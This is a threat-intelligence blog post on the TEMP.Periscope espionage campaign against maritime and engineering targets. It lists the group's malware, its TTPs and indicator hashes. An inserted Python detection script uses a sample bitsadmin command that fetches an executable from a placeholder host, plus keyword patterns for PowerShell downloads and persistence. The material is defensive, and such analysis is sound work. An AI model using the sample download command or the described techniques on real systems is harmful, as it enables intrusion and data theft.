
Intrusions Focus on the Engineering and Maritime Sector
Since early 2018, FireEye (including our FireEye as a Service
(FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been
tracking an ongoing wave of intrusions targeting engineering and
maritime entities, especially those connected to South China Sea
issues. The campaign is linked to a group of suspected Chinese cyber
espionage actors we have tracked since 2013, dubbed TEMP.Periscope.
The group has also been reported as “Leviathan”
by other security firms.
The current campaign is a sharp escalation of detected activity
since summer 2017. Like multiple other Chinese cyber espionage actors,
TEMP.Periscope has recently re-emerged and has been observed
conducting operations with a revised toolkit. Known targets of this
group have been involved in the maritime industry, as well as
engineering-focused entities, and include research institutes,
academic organizations, and private firms in the United States.
FireEye products have robust detection for the malware used in this campaign.
TEMP.Periscope Background
Active since at least 2013, TEMP.Periscope has primarily focused on
maritime-related targets across multiple verticals, including
engineering firms, shipping and transportation, manufacturing,
defense, government offices, and research universities. However, the
group has also targeted professional/consulting services, high-tech
industry, healthcare, and media/publishing. Identified victims were
mostly found in the United States, although organizations in Europe
and at least one in Hong Kong have also been affected. TEMP.Periscope
overlaps in targeting, as well as tactics, techniques, and procedures
(TTPs), with TEMP.Jumper, a group that also overlaps significantly
with public reporting on “NanHaiShu.”
TTPs and Malware Used
In their recent spike in activity, TEMP.Periscope has leveraged a
relatively large library of malware shared with multiple other
suspected Chinese groups. These tools include:
- AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor-controlled profiles on legitimate services.
- BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
- PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listings; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes; returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing files.
- HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with the AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with a single-byte XOR (key 0x56). The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and the malware version for each login session.
- LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
- MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
- China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and perform any other action allowed by the .NET runtime.
The following are tools that TEMP.Periscope has leveraged in past
operations and could use again, though these have not been seen in the
current wave of activity:
- Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
- BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as GitHub and Microsoft’s TechNet portal. Used by APT17 and other Chinese cyber espionage operators.
Additional identifying TTPs include:
- Spear phishing, including the use of probably compromised email accounts.
- Lure documents using CVE-2017-11882 to drop malware.
- Stolen code signing certificates used to sign malware.
- Use of bitsadmin.exe to download additional tools.
- Use of PowerShell to download additional tools.
- Using C:\Windows\Debug and C:\Perflogs as staging directories.
- Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
- Using Windows Management Instrumentation (WMI) for persistence.
- Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a JScript backdoor for persistence.
- Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as GitHub and Microsoft’s TechNet portal.
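The host-based TTPs above (bitsadmin/PowerShell downloads, the C:\Windows\Debug and C:\Perflogs staging directories, wscript.exe launching a script from the Startup folder, and WMI-based persistence) translate directly into process-creation detection logic. The following is an added example, not FireEye's code: it matches Sysmon-style process events against those TTPs. The flattened key=value event format, the sample lines and the WmiPrvSE.exe parent heuristic for WMI persistence are assumptions.

```python
"""Heuristic matching of process-creation events against the TEMP.Periscope
TTPs listed above. Constructed example; event format and samples are assumed."""
import re

# Constructed sample events (Sysmon-style fields flattened to key=value).
SAMPLE_EVENTS = [
    "Image=C:\\Windows\\System32\\bitsadmin.exe ParentImage=C:\\Windows\\System32\\cmd.exe "
    "CommandLine=bitsadmin /transfer job /download /priority high http://example.invalid/a.exe C:\\Perflogs\\a.exe",
    "Image=C:\\Windows\\System32\\wscript.exe ParentImage=C:\\Windows\\explorer.exe "
    "CommandLine=wscript.exe C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.js",
    "Image=C:\\Windows\\Debug\\mt.exe ParentImage=C:\\Windows\\System32\\WmiPrvSE.exe CommandLine=mt.exe -s",
    "Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe CommandLine=notepad.exe",
]

# Staging directories named in the report (compared case-insensitively).
STAGING_DIRS = ("c:\\windows\\debug\\", "c:\\perflogs\\")
FIELDS = r"Image|ParentImage|CommandLine"

def parse_event(line):
    """Parse 'Key=Value ...' where values may contain spaces; keys are a fixed set."""
    pattern = rf"({FIELDS})=(.*?)(?=\s+(?:{FIELDS})=|$)"
    return {m.group(1): m.group(2) for m in re.finditer(pattern, line)}

def match_ttps(event):
    """Return the list of TTP labels an event matches (empty if benign)."""
    img = event.get("Image", "").lower()
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "").lower()
    hits = []
    if img.endswith("bitsadmin.exe") and ("/transfer" in cmd or "/download" in cmd):
        hits.append("bitsadmin download")
    if img.endswith("powershell.exe") and re.search(
            r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", cmd):
        hits.append("powershell download")
    if any(img.startswith(d) or d in cmd for d in STAGING_DIRS):
        hits.append("staging directory")
    if img.endswith("wscript.exe") and "\\startup\\" in cmd and cmd.rstrip().endswith(".js"):
        hits.append("startup wscript jscript")
    if parent.endswith("wmiprvse.exe"):  # heuristic for WMI event-subscription persistence
        hits.append("wmi-spawned process")
    return hits

def scan(lines):
    """Map event index -> matched TTPs for every event that matched at least one."""
    results = {}
    for i, line in enumerate(lines):
        hits = match_ttps(parse_event(line))
        if hits:
            results[i] = hits
    return results
```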
Implications
The current wave of identified intrusions is consistent with
TEMP.Periscope and likely reflects a concerted effort to target
sectors that may yield information that could provide an economic
advantage, research and development data, intellectual property, or an
edge in commercial negotiations.
As we continue to investigate this activity, we may identify
additional data leading to greater analytical confidence linking the
operation to TEMP.Periscope or other known threat actors, as well as
previously unknown campaigns.
Indicators
File | Hash | Description
x.js | 3fefa55daeb167931975c22df3eca20a | HOMEFRY, a 64-bit Windows password
mt.exe | 40528e368d323db0ac5c3f5e1efe4889 | MURKYTOP, a command-line
com4.js | a68bf5fce22e7f1d6f999b7a580ae477 | AIRBREAK, a JavaScript-based
Historical Indicators
File | Hash | Description
green.ddd | 3eb6f85ac046a96204096ab65bbd3e7e | AIRBREAK, a JavaScript-based
BGij | 6e843ef4856336fe3ef4ed27a4c792b1 | Beacon, a commercially available
msresamn.ttf | a9e7539c1ebe857bae6efceefaa9dd16 | PHOTO, also reported as
1024-aa6a121f98330df2edee6c4391df21ff43a33604 | bd9e4c82bf12c4e7a58221fc52fed705 | BADFLICK, backdoor that is capable
This is a Security Bloggers Network syndicated blog post authored by Nick Harbour. Read the original post at: Threat Research Blog